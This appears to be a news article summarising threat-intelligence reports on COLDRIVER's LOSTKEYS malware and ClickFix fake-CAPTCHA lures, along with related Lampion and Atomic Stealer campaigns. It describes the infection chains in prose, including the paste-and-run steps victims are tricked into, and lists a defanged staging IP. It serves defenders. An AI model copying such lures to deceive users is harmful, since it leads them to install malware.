Russian Threat Actors Deploy New LOSTKEYS Malware via ClickFix Fake CAPTCHA Techniques

The Russia-associated threat actor known as COLDRIVER is actively distributing a new type of malware identified as LOSTKEYS, as part of an espionage-oriented campaign utilizing social engineering tactics similar to ClickFix.

According to the Google Threat Intelligence Group (GTIG), “LOSTKEYS is designed to exfiltrate files based on a predetermined list of file extensions and directories, while also gathering system information and active processes to relay back to the attacker.”

This malware was detected in January, March, and April 2025 during targeted attacks against current and former advisors to Western governmental and military entities, in addition to journalists, think tanks, and non-governmental organizations (NGOs). Notably, individuals affiliated with Ukraine have also been specifically targeted.

LOSTKEYS marks the second unique malware developed by COLDRIVER, following the earlier identified malware, SPICA, indicating a strategic shift from the threat actor’s previous reliance on credential phishing techniques. COLDRIVER is also recognized under alternative designations, such as Callisto, Star Blizzard, and UNC4057.

Historically, the group has focused on credential theft; once successful in breaching an account, they typically exfiltrate emails and contact lists from the affected user’s account, as noted by security researcher Wesley Shields. “In select scenarios, COLDRIVER also deploys malware to the targeted device and may seek access to local files,” Shields elaborated.

The current wave of attacks begins with a decoy website that features a fraudulent CAPTCHA verification prompt, instructing victims to open the Windows Run dialog and execute a PowerShell command copied to their clipboard. This tactic, resembling the ClickFix technique, encourages user participation in the malware installation process.

The PowerShell command is engineered to download and initiate subsequent payloads from a remote server (“165.227.148[.]68”), functioning as an intermediary downloader while performing specific checks to evade detection within virtual environments.

The third-stage payload, a Base64-encoded blob, is decoded into a PowerShell script tasked with executing the LOSTKEYS malware on the infected system. This capability enables the threat actor to collect system data, operating processes, and targeted files identified by the established list of extensions and directories.

Similar to the use of SPICA, the deployment of LOSTKEYS seems to be carried out in a selective manner, underscoring the precision-focused approach of these attacks. Another distinguishing feature includes the implementation of unique identifiers and encryption keys tailored for each infection sequence to facilitate the retrieval and decoding of subsequent payloads.

Furthermore, Google reports the discovery of additional LOSTKEYS artifacts dated back to December 2023, masquerading as binaries associated with the Maltego open-source investigation tool. It remains unclear whether these instances are linked to COLDRIVER or if the malware has been repurposed by the group since early 2025.

Continued Adoption of ClickFix

The rise of the ClickFix strategy is notable as it gains traction among various threat actors deploying a diverse array of malware families, such as the banking trojan Lampion and Atomic Stealer.

Recent attacks associated with Lampion, as reported by Palo Alto Networks Unit 42, leverage phishing emails containing ZIP file attachments. This ZIP archive conceals an HTML file redirecting the recipient to a counterfeit landing page that instructs them in the ClickFix process, thereby initiating a multi-stage infection.

Unit 42 further elaborates that Lampion’s infection sequence is fragmented into multiple non-consecutive stages, executed as distinct processes, complicating detection efforts as the attack does not present a clear process tree but a convoluted series of events that may appear innocuous when viewed individually.

The targeted individuals encompass Portuguese-speaking individuals and organizations spanning various sectors, including government, finance, and transportation, as highlighted by Unit 42.

Moreover, recent developments show that the ClickFix technique has been integrated with a tactic known as EtherHiding. This method utilizes Binance’s Smart Chain (BSC) contracts to obscure the delivery of the subsequent payload, culminating in the distribution of a macOS information stealer named Atomic Stealer.

Details from an independent researcher identified as Badbyte reveal that engaging with CAPTCHA prompts triggers a Binance Smart Contract, using EtherHiding to send a Base64-encoded command to the user’s clipboard, which they are then instructed to execute in macOS’s Terminal using specific keystrokes (⌘ + Space, ⌘ + V). This command subsequently downloads a script that retrieves and runs a signed Mach-O binary, which has been confirmed as Atomic Stealer.

Further investigation has revealed that the campaign has likely compromised approximately 2,800 legitimate websites to display counterfeit CAPTCHA prompts. This extensive watering hole attack, referred to as MacReaper by the researcher, employs obfuscated JavaScript and multiple full-screen iframes along with blockchain-based command infrastructure to maximize infection potential.